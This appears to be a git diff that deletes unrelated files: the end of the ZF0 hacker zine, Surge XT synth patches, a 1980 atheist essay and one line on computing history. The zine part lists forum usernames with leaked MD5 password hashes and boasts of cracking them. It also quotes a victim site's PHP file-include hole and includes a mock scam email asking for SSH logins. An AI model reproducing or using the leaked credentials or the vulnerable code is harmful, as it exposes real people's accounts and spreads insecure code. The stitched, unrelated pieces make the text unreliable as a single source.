-ion 4a548addbfb239bbd12f5afe11a4b6dc
-joniesan dff7cd7a0f4ecc53b25b8042eedde5c5
-storm03 682ceae6fd02b6019475c9db2a183c60
-hjort-r 6e48ca4c69e3d00b5b8fbbd06f6985f4
-Destradix 23b53849ac09d1a1e6f05613ac45a42d
-pelister 1327b27ae2d4069a820bcc5071fb4c55
-pionext a32bced88c7008f60b93432ea571763d
-fos e5b3a58bac579a03566e69a8a8d04d4a
-restif c1d5b24f99ea1051afcbd9f0154a543b
-wiking 49d2503cabac0686951637454186171f
-tonyz 3021d2a32bc9b897039aab8d741ac1cb
-sandman233 7a6e614ec17bce4f0238ef1803569094
-wenjintao 4297f44b13955235245b2497399d7a93
-hkopgood 5cd381d39aac81296d1a5aac1cf07ea1
-Daldom b44b82d0105c84e2feb7c6cae1508c3f
-Chris 944facfeb153b4f01916a0f166fcc315
-joes 76feb9047cda4b67caef7e7bdbb6b4d0
-Crazy b8bd415b96ff7b0592d30e95a2b0a0cd
-mycologist 7a85baabb14687ef170c5a84039f76a4
-jmesmon ce5225d01c39d2567bc229501d9e610d
-Recesscrash a4a3e3662bd0008d086b982768c4e5b9
-Constantine b05e02d26b524e4287428984d14a6824
-curiosity81 ba018160fc26e0cc2e929b8e071f052d
-litebox bb80b2dcdfbbf078aabf49e7253ed25b
-gena 51cbb1c0757de2a559396bb55180ed3a
-huhh 9cb51b2a6ac4724aa7e12f91f2775454
-katana 8ceb924fa49fc813f25fcd61ab579935
-srd e2f3a4883a4c8781ac124b5ea11fc573
-roncarlston22 d3026390ef1ea69288138c49d6327cfb
-benike 827ccb0eea8a706c4c34a16891f84e7b
-peiying31 7c4e950b5bc7c683ab6812707379b642
-dragonouv 696fbf17aefa357b0a62a92a87e8652e
-Ichan c57c9baef7cf01daa3aeed7ed5a592ad
-elle-bella b11e2a67f009c0a7173a89bd440cebca
-dirtydsanchez 39f13d60b3f6fbe0ba1636b0a9283c50
-romelo 82cd7f755ce86ca71885967c75083bea
-TOMBRADY 7c6a180b36896a0a8c02787eeafb0e4c
-mohammed 9b7148bf61baaf1128fc3226a1752ed3
-loloko b2e5ef3e4af2bac2a05ef5c7c00f2a34
-sexsmurf 3d6c68e00151c9284c3e344cbb9886b2
-ignotus e422d8c86b036c44ab1c1e7cfc0d4f97
-Apotheosis 3d89c820079990509a02104a0bc1196f
-Ag4r 3d78a82b018ee223c1fecdfbaf4979fe
-chilsung 73f2b9ad80693506f5fc6b1fd505b2e3
-harveyheckler 09b033b1aa58ba9535b900bdd47da316
-hamburglar e511145ba1e0ea2e8c21a0a13ba2c853
-remz ea58881c7c420d82c44a2bb1db77c4ae
-00kuroro00 e10adc3949ba59abbe56e057f20f883e
-tome a4b46da106e59f424a2310cb7766366e
-mike6426 a3fa9e0b6b24b1cada4b756c0d240444
-x_h0rr0r_x dce69de4c279a4257289e14fc536dfa6
-d0lla dce69de4c279a4257289e14fc536dfa6
-mattdamon a883241dd51bda403ae5d9eb14e41331
-sadelphi 55588b38933450f80d76761f59c75626
-joffa 0fe073ab8214a666258e3e51e267af03
-errata 8a80647f22cc26c41c05797c7126e252
-Hacktivist 84b6bff75d2fccfa0be3d8b948899ed1
-saguy 831dd9a4ff236903b0635228b219ea82
-molina21 bd2c1c666a5f5aeaa9ad9a2228157c0d
-Sirio 6e6a9ad2b2a4a4bca942177fbf3bd1fd
-jaysscholar eb88614caf3b766ed80eb95ade06a868
-halloffame 127c6a283b803a6888c6abab4e3c990b
-EliteBattleman 416a872750a9cb239d638718da48952b
-rolyeguez d591713ae011a0c068e7e41e67090134
-b02k31337 1b6d47df5dd084b34acb0421254c3559
-Tassy e15e8305ba59075d89ab25d83823358e
-shooter11 c5fe25896e49ddfe996db7508cf00534
-rohdus 2e78dda59ee83ab00cd22bee344ef3a6
-deamos 0ac0c4accdc5b0b0469806e9be381be1
-newman d482aa034eb68d0630270db1a376a0e2
-Craftuser 057b3b95df64e1680da1259ce1fb9b45
-bekoz 574bf934c801603f9f128139d9c75c85
-Snpdo 5ada5946feba299ba4020a0410c93f3c
-repeekyrots 6eeb96b97131a28cac993ca246477ac7
-ironjrackham ecd729e1e507d6b9593a8330d4ad0795
-kostriak1 bed77bf881c52caf14da5d0b9cd84bc8
-gwyn31 cb205edee16b24366c871cf55e781346
-Chrono Clock d0f36b76d650a598455aaa62102f16fa
-judas 7ec8163d877c1fb0eb83e8db515ab0a0
-nhamvidan 80624718ead20144dab3116e53e54932
-dlee ca6d3bc908fb11928cec1fa4fdbfe50b
-gwyn c524ed2dab8f2edfe1cc34528df0e9c2
-crfog 5badcaf789d3d1d09794d8f021f40f0e
-deliciousk fcc82593b06931d8c1aa15c1dd7dbab9
-JackCarlos 3792405c4101502fdd0be7f548818d46
-silentmyst 81ccb67b3ecce8bbd4c38165af29eda9
-Titaneous 6538f2edf1e42690f111f871be7e7464
-lgp802a 727ea5586da5a8fb76cc7b12e01895cc
-GameOver d22157676066a47c49584db544192aa5
-Florentino 6aecdfe8b004d1e8cb1e42c4414687a9
-Marlark 1e20f72184e82e0f5ffce621a1cc6d10
-majejo ff8065fc1c559d715ba2dc7ea7359945
-finalta 677b724e54004173026c13a754ff591e
- .-. _ _ .-.
- / \ .-. ((___)) .-. / \
- /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \
--/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\-
-/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\
- \ / `-' (U) `-' \ /
- `-' `-'
-God damn that all felt so good. We pwned,,,,,, dildog's
-life... That's a lot of stuff! Stopping was optional, there's no end!
-cdc has some interesting people and some who are technically inclined. But that's
-the thing, interesting *people*, not interesting *hackers*. That is only a
-problem because they tell the world that they are leading hackers, when they do
-not even qualify. At best they had a couple of people in the mid-90s, and now a
-couple of people who joined cdc but whose tech interests are entirely unrelated.
-Any hacking going on is not going on in cdc; cdc is just a banner organisation
-that they can all use to add another line to their About pages.
-They need to fuck off with this hacker stuff. Just drop it. Drop oxblood because
-he is only around to be the media man. Just settle for being a community of
-friends, and resist the temptation to tell people that cdc is a hacking group.
-It's just a big scam, a big lie - gobbles said it in 2002 and we are saying it
-now. You have defined your organisation around the concept of misleading people
-who are not in a position to know better.
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-zf0 zf0
-zf0 Pwnee Awards zf0
-zf0 zf0
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-The Pwnee Awards are a whenever-we-want underground ceremony celebrating feats in
-being pwned. We (ZF0) are the pwners, the winners are pwnees. This is our little
-review of the zine, a winding down as we end.
-== Most Blatant Security Hole ===============================================
-======================================================= Winner: Rob O'Hara ==
-if (isset($_GET['file'])) {
-$file = $_GET['file'];
-$page = $file . '.txt';
- $picture = $file . '.jpg'; ##### This also loads a picture of the
-same file name. Handy, but not here.
- if (file_exists($picture))
- { echo "<img src=\"" . $picture . "\" align=\"right\">";
- require_once "$page"; }
- else
- {
- require_once "$page";
- }}
-else {
-$page = 'index.txt';
-require_once "$page";
-The above code is a textbook file include vulnerability. One little catch
-though, remote files were disabled, so we had to use fun tricks to own the
-box. Those tricks are Copyright ZF0 2008, we'll license them for the right
-price! Seriously though, that's a really bad vuln. It's obvious, easy to
-find (completely outer layer), and easy to exploit.
-== Most Thoroughly Refuted Whitehat Security Product ========================
-=============================================== Winner: Comodo HackerProof ==
-Not much to say on this except that HackerProof does not do much for you,
-and that the naming is complete misrepresentation meant to separate fools
-and their money.
-Not much point, unfortunately, since anyone reading this already knew that.
-== Most Hashes Cracked ======================================================
-======================================================= Winner: Blackcode ==
-We actually cracked something over 4,000 of the nearly 10,000 blackcode
-hashes. We have invented a Noob Index. It works like this: you take the
-percent of hashes cracked, and double it. That's how juvenile the
-community is. Gives BC over a 80 score, the highest in this zine.
-There have been a lot of complaints about us dropping hashes, and about
-the length of our zine. So we just saved all those for ourselves and gave
-you the mod passwords, motherfuckers. You can beg us for passes if you need
-== So Annoying We Couldn't Stop Ourselves From Publishing Their Lame Asses ==
-=================================================== Winner: Triviasecurity ==
-That basically says it all right there. They are the least notable hack in
-this zine but someone just got too annoyed at them.
-== Most Outrageous RM =======================================================
-============================================================ Winner: g00ns ==
-Everything from DDoSing their server, to mass confusion about who did the rm,
-to g00ns members trolling, quitting, lecturing, complaining, and probably
-crying, it was just a good time watching.
-====================== Until next time, stay safe! ==========================
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-zf0 zf0
-zf0 On our way out zf0
-zf0 zf0
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-Good Day!
-I am a internet hacker from the group ZF0. I am writing you this email to ask
-for your support and co-operation to carry out this transaction. We have
-discovered some abandoned warez that includes, g00ns IRC logs dating back
-months, full g00ns hack logs and misc Wordpress databases, on a random computer
-somewhere in Italy. We believe the box belonged to a deceased internet hacker.
-We have made every attempt to contact next-of-kin but none have been
-We have now decided to look for a trusted partner to apply a claim to this
-data. The problem is we need a foreign computer to house this data as we cannot
-afford to maintain the deceased internet connection - it must be foreign as we
-do not wish the data to fall into the hands of computer forensics agents. We
-see that as e-walking on someones grave.
-If you are willing to help us, please confirm via contacting us on the email
-address below. Please send your Full name, IP address, domains you own and most
-importantly valid ssh account details to allow us to transport the data via the
-secure protocol (We do not want government agencies to wiretap and steal the
-data in transit).
-You are most kind good sir
-Giovanni Balechi
-~~~~~~~~~~~~~~~~~~~~~~~~~~ Hope you enjoyed the show ~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~~~~~~~~ ~~~~~~~~~
-~~~~~~ Bye Bye ~~~~~~
-~~~ ~~~
diff --git a/fun/music/surge_xt/.description b/fun/music/surge_xt/.description
deleted file mode 100644
index d15b00a..0000000
--- a/fun/music/surge_xt/.description
+++ /dev/null
@@ -1,10 +0,0 @@
-Sounds I've made or am still messing with in Surge XT.
-I'll probably add some recordings later on, but for now, these are just
-the patch files which you can load into Surge XT and play with a MIDI
-Surge XT is a relatively new open source synth I've been learning since
-early 2023.
-A lot of this I just save and forget so don't expect too much here.
diff --git a/fun/music/surge_xt/Patches/Basses/Evolving Bass.fxp b/fun/music/surge_xt/Patches/Basses/Evolving Bass.fxp
deleted file mode 100644
index bddfe3e..0000000
--- a/fun/music/surge_xt/Patches/Basses/Evolving Bass.fxp
+++ /dev/null
Binary files differ
diff --git a/fun/music/surge_xt/Patches/Basses/fat metal.fxp b/fun/music/surge_xt/Patches/Basses/fat metal.fxp
deleted file mode 100644
index 631ccc5..0000000
--- a/fun/music/surge_xt/Patches/Basses/fat metal.fxp
+++ /dev/null
Binary files differ
diff --git a/fun/music/surge_xt/Patches/Basses/future metal 2.fxp b/fun/music/surge_xt/Patches/Basses/future metal 2.fxp
deleted file mode 100644
index 7c156dc..0000000
--- a/fun/music/surge_xt/Patches/Basses/future metal 2.fxp
+++ /dev/null
Binary files differ
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-Atheism: An Affirmative View (1980)
-Emmett F. Fields
-What is Atheism that it survives?
-Every religion, from earliest times, has hated and condemned those who
-could not believe whatever it was that those old religions happened to
-believe. Throughout the ages there have been the 'intellectual outlaws'
-who have questioned the "unquestionable," and doubted even the very
-existence of the gods. And those individual thinkers have been hated,
-hunted, persecuted, and murdered by the religious believers. Yet the
-Atheists and doubters are very much with us today, but those old
-religions, and the gods they created, have long since ceased to trouble
-the thoughts of mankind.
-If Atheism is considered to be a religion, then it is easily the oldest
-living religion in the world. Properly stated, Atheism is truly "that old
-time religion" that the Baptists keep singing about.
-Atheism is a difficult subject only because of the slander and
-misrepresentations preached and published against it. Even the information
-that is available in our most trusted and respected reference books is the
-distorted and prejudiced view presented by religion. Just as in Communist
-countries, where the articles on Capitalism, democracy, politics, etc.,
-are always written by Communists and from the Communist point of view, so
-in Christian dominated societies, such as the United States, all articles
-on Atheism, Rationalism, Freethought, etc., that are to be found in
-encyclopedias and other reference books, are written by theologians, and
-from the Christian point of view.
-The article on Atheism in the current edition of the Encyclopedia
-Britannica was written by a Roman Catholic Jesuit Priest, Rev. Cornello
-Fabro, Professor of theoretical Philosophy, University of Perugia, Italy.
-In the Encyclopedia Americana the article on Atheism was written by Roger
-L. Shinn, a professor at Union Theological Seminary. It seems that
-religion, like Communism, can survive only when it can control the
-information about conflicting beliefs.
-This system of writing the most trusted and basic reference and
-information books from the point of view of the dominant ideology in every
-society has the dangerous effect of further polarizing and isolating the
-peoples of the world within their own narrow beliefs, and of creating
-contempt and distrust for all others.
-America was not established to have any dominant ideology, The United
-States was meant to be 'a free marketplace of ideas,' where every opinion
-could be heard and considered. Today we must consider the various ideas
-and opinions as they are presented in great newspapers and reference
-And so it is of the utmost importance that these ideas and opinions be
-presented honestly, by the people who accept them, believe in them, and
-are convinced they are the best answers to the problems under
-consideration. Then, and only then, will people have any real opportunity
-to make an intelligent decision about the beliefs they are investigating.
-The American people have a right to know that in Atheism there is a moral,
-sensible, and scientific alternative to religion.
-There can be no doubt but that the people of this nation must be among the
-most deceived and brainwashed in the world, at least, at very least, in
-the area of religion. As an Atheist I have a very special reverence for
-truth, real truth, truth with fact and proof behind it. And it is
-infuriating to me when I go into a public library and read the lies and
-misrepresentations that are being fed to the eager, active, and searching
-young minds that use our libraries in their quest for truth and
-The first step, then, in understanding Atheism is to disregard all the
-lies and propaganda that religion has spread against it. Atheism is more
-than just the knowledge that gods do not exist, and that religion is
-either a mistake or a fraud. Atheism is an attitude, a frame of mind that
-looks at the world objectively, fearlessly, always trying to understand
-all things as a part of nature. It could be said that Atheism has a
-doctrine to question and a dogma to doubt. It is the human mind in its
-natural environment, nothing is too holy to be investigated, nor too
-sacred to be questioned. The Atheist Bible, it could be said, has but one
-word: "THINK." Atheism is the complete emancipation of the human mind from
-the chains and fears of superstition.
-There is absolutely nothing negative about Atheism; truth can never be
-negative. The Atheist demands proof, or at least reasonable evidence, and
-simply rejects whatever does not meet the basic requirements of common
-sense. Throughout history all progress in society has come from doubting
-and rejecting old ideas, old customs, and old beliefs. The tree of human
-knowledge dies as it grows, with new growth growing out of the dead and
-dying parts, and replacing it with better and truer beliefs. The
-Theologian is an owl, sitting on an old dead branch in the tree of human
-knowledge, and hooting the same old hoots that have been hooted for
-hundreds and thousands of years, but he has never given a hoot for
-Morally speaking, Atheism has a great advantage over religion. The great
-failure of religious morality comes from their illusion of a morality
-above right and wrong. The religious mind has always known it is wrong to
-murder and torture, wrong to persecute and hate, wrong to force its
-beliefs upon others. Religion has always known these things are wrong, but
-the religious mind suffers from the illusion of a "higher morality," and
-because of that illusion all history runs deep with innocent blood. In the
-name of their "god" and a "higher morality," Christians have waged holy
-wars of extermination, have plundered, tortured and murdered those who
-could not agree with their religion, or who had never even heard of it. In
-the name of this "higher morality" Christians have hated, hunted,
-persecuted, and burned alive the "heretic," the "infidel" and the
-And today, as always, when the religious person does a thing that even he
-recognizes as being wrong and immoral, his illusion of a "higher power"
-and a "greater morality" allows him to perform some ritual, confession, or
-prayer, and presto, miraculously, "all his sins are taken away", and he is
-free again from all pains of conscience and regret.
-Such foolish illusions do not comfort the Atheist mind. The Atheist knows
-there is no morality above right and wrong, and no escape from the pains
-of conscience and remorse. Murder is murder, and robbery, hate and
-persecution are all crimes against humanity. Morally speaking, it is
-better to be murdered than to be the murderer; better to be robbed than to
-be the robber, and better to be hated and persecuted than to be among
-those who hate and persecute. Morally speaking, then, history tells us it
-is better to be an Atheist than to be a Christian.
-Religion claims that immorality always springs from a lack of religion,
-but the facts prove just the opposite. Christianity has never been
-stronger than it is today, Christians have churches in every community,
-they monopolize radio and television time with religious propaganda, they
-have forced their religion into our government, our laws, and into our
-schools. They have done these things against the Constitution of the
-United States, and against the most basic and sacred rights of all other
-Americans. Like a sinking ship, with water rushing in and filling every
-compartment where it was not supposed to be, so religion has attacked our
-nation, rushed in where it was not supposed to be, where it has no
-business to be, silencing all opposition, all opposing views, poisoning
-the wells of our knowledge, and endangering the very roots of our nation.
-Christianity is that strong today, and yet we have not achieved any
-respectable amount of morality in this country. Nowhere is the failure of
-Christian morality more evident than in America. During the same time that
-Christianity has been growing ever stronger and ever richer, over the past
-thirty years or so, the use of harmful drugs has became a national
-scandal, the crime rate has been climbing ever higher and ever faster, the
-divorce rate has skyrocketed, and during that time our nation has been
-embroiled in more wars and international conflicts than in any other
-similar time period in its history. During that time, our nation was also
-getting its 5000 or so weird religious cults, a byproduct of Christian
-indoctrination. Right to-day we have the highest narcotics abuse rate, the
-highest crime rate, the highest divorce rate, and the highest 'religion
-rate' that we have ever had in the history of this nation. What does
-Christianity say about these facts and how to cure them? They tell us we
-need more religion and they are determined to force it upon us.
-Christianity feels so strong today that it is moving into politics to try
-to force its failing morality upon every American through a Christian
-Dictatorship and a new Dark Age.
-Once Atheism is achieved, and the mind has escaped entirely from the
-religious fears and beliefs that are put upon us from earliest childhood;
-and once we can look at religion objectively and impartially, it becomes
-entirely obvious that religion has all the characteristics of a form of
-insanity. To one degree or another the religious mind must accept, and
-believe in, another world; a supernatural or unnatural world, a world
-filled with all sorts of imaginary beings called gods, devils, angels,
-saints, demons, etc. These imaginary creatures are talked to, asked for
-favors, guidance, "signs," or miracles, and then blamed or thanked for
-natural events that follow. Except for the cloak of religion, such beliefs
-and actions would otherwise cause an individual to be judged insane, and
-committed to an institution for treatment.
-The study of history will further justify the theory that religion is a
-form of insanity. No sane and healthy minds could have waged the bloody
-religious wars and crusades where the conquered were slaughtered, men,
-women, and children, even infants, all were put to the sword simply
-because they were "infidels" or "heretics." The dungeons and torture
-chambers of the Holy Inquisition could not have been run by sane and
-healthy minds. And it had to be the insane mind, the religious mind, that
-would tie a woman to a stake, pile wood and fagots around her and burn her
-alive for the impossible crime of being a witch. No sane person could read
-of the horrors, rape and slaughter in a savage book and call that book
-"the word of God." And the Jesus myth, about a god who must become a man
-and be murdered before he can forgive mankind, is the most insane of all.
-Today, Christianity chooses to ignore, or to hide and deny, its own bloody
-history and to claim that it is the very foundation of our morals, and
-even of our civilization. Religion also claims to be our only hope and
-guide for the future. In view of Christian history these claims are, in
-themselves, sheer insanity.
-But Christianity is not the only form of organized insanity in the world
-today. The Atheist, being an individual who stands outside all belief
-systems, is well aware that there are other religions and beliefs that are
-equally insane and dangerous. Christianity is simply most dangerous to the
-United States; to our government, our freedom and our future, because it
-is here, it is powerful, it is wealthy, and it is entirely unscrupulous.
-In addition to its illusion of a morality above right and wrong, I must
-add, and emphasize, that it also has an illusion of a "higher allegiance"
-to something above truth, above justice, and above America and national
-patriotism. It does not require that a person be an Atheist to be aware
-that Christian Fundamentalism is today the greatest threat to our nation
-and its freedom.
-Communism is by far the worst thing that has happened to the world in the
-last two hundred years, but it is also the best thing that has happened to
-Christianity since the plagues. During the plagues the churches received
-great wealth from people who gave their possessions and land to the church
-in the hope that God would spare their lives, and the lives of their loved
-ones. And so today religion is again growing rich and powerful from our
-modern-day plague; Communism.
-Christians are constantly using Communism as a club to beat down all
-opposition to their religion, their power and their schemes. Anyone who
-disagrees with them, Atheist or not, is denounced as being a "Communist."
-Religion implies that there is an inseparable connection between the
-political-economic dictatorship called Communism, and the freedom from
-religion called Atheism. Religion chooses to ignore the fact that Atheism
-is older than Communism and Christianity put together.
-Even the fear and hate that religion is preaching against Communism is not
-aimed at the political-economic ideology that is the cause of our trouble,
-but at the "atheistic" aspect that is not the problem.
-Let us consider very carefully what the connection is between Atheism and
-Communism in Russia. There can be no doubt but that Atheism is the reason
-for the success of Communism. Atheism is the force that brought the
-Russian nation up from being one of the most backward, primitive and
-religious nations in Europe in 1917, to the point of being one of the most
-advanced, scientific and technological, nations in the world today,
-Whether we like it or not, we must admit that Communist Russia is a
-powerful modern force, and a very dangerous potential enemy. Communism is
-an external threat to our nation, and to our very world, that is of great
-concern to all Americans, Atheists and Christians alike.
-It must be admitted that Atheism is the engine and the thrust behind
-Communism that has allowed it to move forward into the modern world in
-such a short time. Atheism is the engine and the thrust, but it is not the
-steering wheel. The dominant, controlling ideology in Russia is the
-economic-political dictatorship known as Communism. Even the Christians,
-if they could be taught to hate a little less, and think a little more,
-would have to admit that.
-Atheism is, has been, and will continue to be, the force for progress
-throughout the Communist world, it is the powerful engine that powers an
-evil ideology. Today we are in a desperate race for our very survival.
-America and the free world cannot win that race if we continue to allow a
-primitive, medieval superstition to hinder our progress. Because of that
-superstition we have lost our lead, and because of that superstition we
-may lose the race.
-What is the difference between our own Christian dominated society, and
-the Atheist-oriented society in Russia? What is it that will make such a
-great difference in the future progress of these two societies? According
-to a special report in 'Science 80' Magazine concerning the Communist
-threat, reads: "This challenge is expressed not only in growing military
-strength but in a bid to outpace the United States and other Western
-nations through an educational "mobilization" program designed to prepare
-all Soviet youth to participate fully in an advanced technological
-society." The article goes on to say "The Soviets have put massive
-resources behind their assumption that a decisive advantage is to be
-gained by raising the level of scientific literacy and numeracy of their
-And what are we doing in the United States to keep up with the Communist
-efforts to advance even further their scientific and math education
-systems, systems that are so very important to any modern technological,
-military society? At present we have a great push by Christianity to have
-their primitive "creation" myth hidden under the guise of
-"Scientific-Creationism," taught in our public schools on an equal basis
-with the well established and accepted modern theory of organic evolution.
-This is the same battle that was fought in the courtroom during the Scopes
-"monkey trial" in 1925, a trial which made this country the laughing stock
-of the modern world. It is the same war that has been raging between
-Christianity and the modern world since 1859 when Charles Darwin's 'The
-Origin of Species' was first published. For over one hundred and twenty
-years Christianity has tried to prevent us from making any progress in
-this basic science. The truth is, of course, that Christianity has always
-fought every fact of science and modern knowledge that did not conform to
-its primitive Bible, written and copied, as it were, by ignorant,
-half-civilized nomads some four thousand years ago.
-How can we hope to survive as a nation, keep our freedom and remain a
-force in the modern world unless we cast aside the superstitions of
-primitive times, and adopt the scientific, technological, "Atheistic" if
-you will, society that reason and common sense demands? It is time, and
-long past the time, for Atheists in America to come out of their libraries
-and defend our modern world and our nation against religion and Communism.
-Today we live in a world divided and tuned for war; tuned for a war so
-unlike any previous war that wisdom can only shudder at the thought of it.
-This is a world always fearful that the other side may strike first, and
-thus gain some decisive advantage. It is fearful also to strike first
-itself, lest it fail to devastate the enemy completely, and leave him able
-to retaliate with devastation. Thoughtful people all over the world
-realize that the situation is more dangerous than the enemy. That each
-side has a tiger by the tail, and both sides are afraid to let go, or even
-to lessen its grip, lest that side be utterly destroyed. Intelligent
-people all over the world are working for an easing of tensions, a
-lessening of armaments, and are searching for a common ground upon which
-both sides might find some point from which to begin establishing a
-working relationship. A relationship that would lead to a progressive
-lessening of the threat of a nuclear holocaust, and the eventual
-establishment of a peaceful and lasting coexistence.
-Intelligent people all over the world are working for these things, but
-Christian fundamentalists are not. Christians are shouting "No coexistence
-with Godless Communism" and "Atheistic Communism must be destroyed." This
-is indeed the final proof that religion is a form of insanity. We must
-judge Christianity by what it has done throughout its history, and it has
-never been a force for peace. We must judge what Christianity is doing
-today in preaching hate against that part of our world that has outgrown
-and rejected Christianity. And we must judge what chance we have for
-survival if our part of the world continues to be held back by religion.
-Atheism has brought the Russian nation great progress in scientific and
-technological advances, and has made Communism a powerful force in the
-world. But Atheism could have been doing great things for us also, if we
-had allowed our society to lay aside, through education, the foolish old
-beliefs that are hindering our progress, our defense, and our very
-Where do we begin our long journey back to reality, back to sanity? I
-would start with an 'International Encyclopedia of Information,' written
-by those who believe the ideas and from their point of view. Imagine an
-American going to a library and learning what Atheism is, instead of what
-it is not. Imagine a Russian going to his library and learning what
-Capitalism is instead of what it is not. Imagine people all over the world
-going to their libraries and reading the same histories, truthful
-histories, histories that will not need to be changed when ever there is a
-political or religious power change. Let Communism write what it believes,
-let Capitalism write what it believes. Let both work together to write a
-universal history, and if they can't agree about the facts of history, let
-them both write their view of history and let them be published side by
-side, and let the reader be the judge. The purpose of a history or an
-encyclopedia is education, not propaganda.
-After all, it was the Encyclopedia, the French encyclopedia of Diderot and
-others, that was so instrumental in bringing Europe out of the Christian
-Dark Ages during the Renaissance. There is every reason to believe that a
-universal source of basic information would be a great step toward ending
-much of the distrust and confusion that is at the very root of our trouble
-in the world today.
-There is no part of the world where the people are all bad, and another
-part where the people are all good. When nations go to war, people go out
-and kill people. People who, under different circumstances, might well be
-their honored and trusted friends. Christianity has never prevented a war,
-but has been responsible for many wars because of its prejudice against
-all other religions, and especially against Atheism.
-Some time ago I prepared "An Atheist's Message to America." I have read it
-at other talks and meetings. It reads:
-"The overabundance of religious propaganda in this country would lead us
-to believe that the primary purpose of this nation is the preservation and
-expansion of the Christian religion. But that is not true.
-Our nation is not, and must not become, the battleship of the Christian
-religion. Our struggle in the world is in defense of LIBERTY. To preserve
-our own, and, if possible, to help others gain and keep theirs.
-This nation is not fighting "Godless Atheism" nor "Atheistic Communism,"
-nor any other group or nation that has had Christian hate terms applied to
-We, as a nation, are opposed to Communism because Communism, like
-Christianity, is an ideological force that is destructive to human rights
-and freedom. It is, in fact, none of our business whether another nation,
-or another individual, believes in a god or not. Our only concern is that
-every individual must have the liberty to decide just what he, or she, can
-and will believe. And have the freedom to express, publish and pursue
-those beliefs in perfect safety.
-In short, our only concern in the world is exactly those ideals that this
-great nation of ours was originally founded upon."
-And so after all this, let us look again at our original question: "What
-is Atheism that it survives?"
-Atheism is the world of reality, it is reason, it is freedom, Atheism is
-human concern, and intellectual honesty to a degree that the religious
-mind cannot begin to understand. And yet it is more than this. Atheism is
-not an old religion, it is not a new and coming religion, in fact it is
-not, and never has been, a religion at all. The definition of Atheism is
-magnificent in its simplicity: Atheism is merely the bed-rock of sanity in
-a world of madness.
-July 20, 1990
-The above talk was delivered at the Thomas Jefferson Unitarian Church in
-Louisville, Kentucky on Sunday, October 19, 1980, and was published in the
-July-August 1981 'American Rationalist' magazine (P.O. Box 994, St Louis,
-MO. 63188.) and has been sold as a pamphlet by them ever since.
-There has been a great change in the world situation during the past year
-and a half. The dangerous situation discussed in the above lecture has, at
-last, been broken. But it was not done by Christian love or by any
-believer in a god. It was an Atheist, Mr. Mikhail Gorbachev, who had the
-intelligence, courage and leadership to move his country, the Soviet
-Union, in a direction of peace and understanding. By Mr. Gorbachev's
-wisdom and action, and his alone, the tensions have been greatly reduced.
-But already Christians are claiming that the achievement was the work of
-their god, and, I am sure, in future issues of our Encyclopedias the
-credit will, somehow, (as always) be given to Christianity and its god.
-Nothing changes history like the Christian Historian.
-Emmett F. Fields
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-My fundamental interest in the history of computing, software, and the
-internet really boils down to one question.
-How did we arrive at a place where the world is governed by technologies
-that few, if anyone, understand?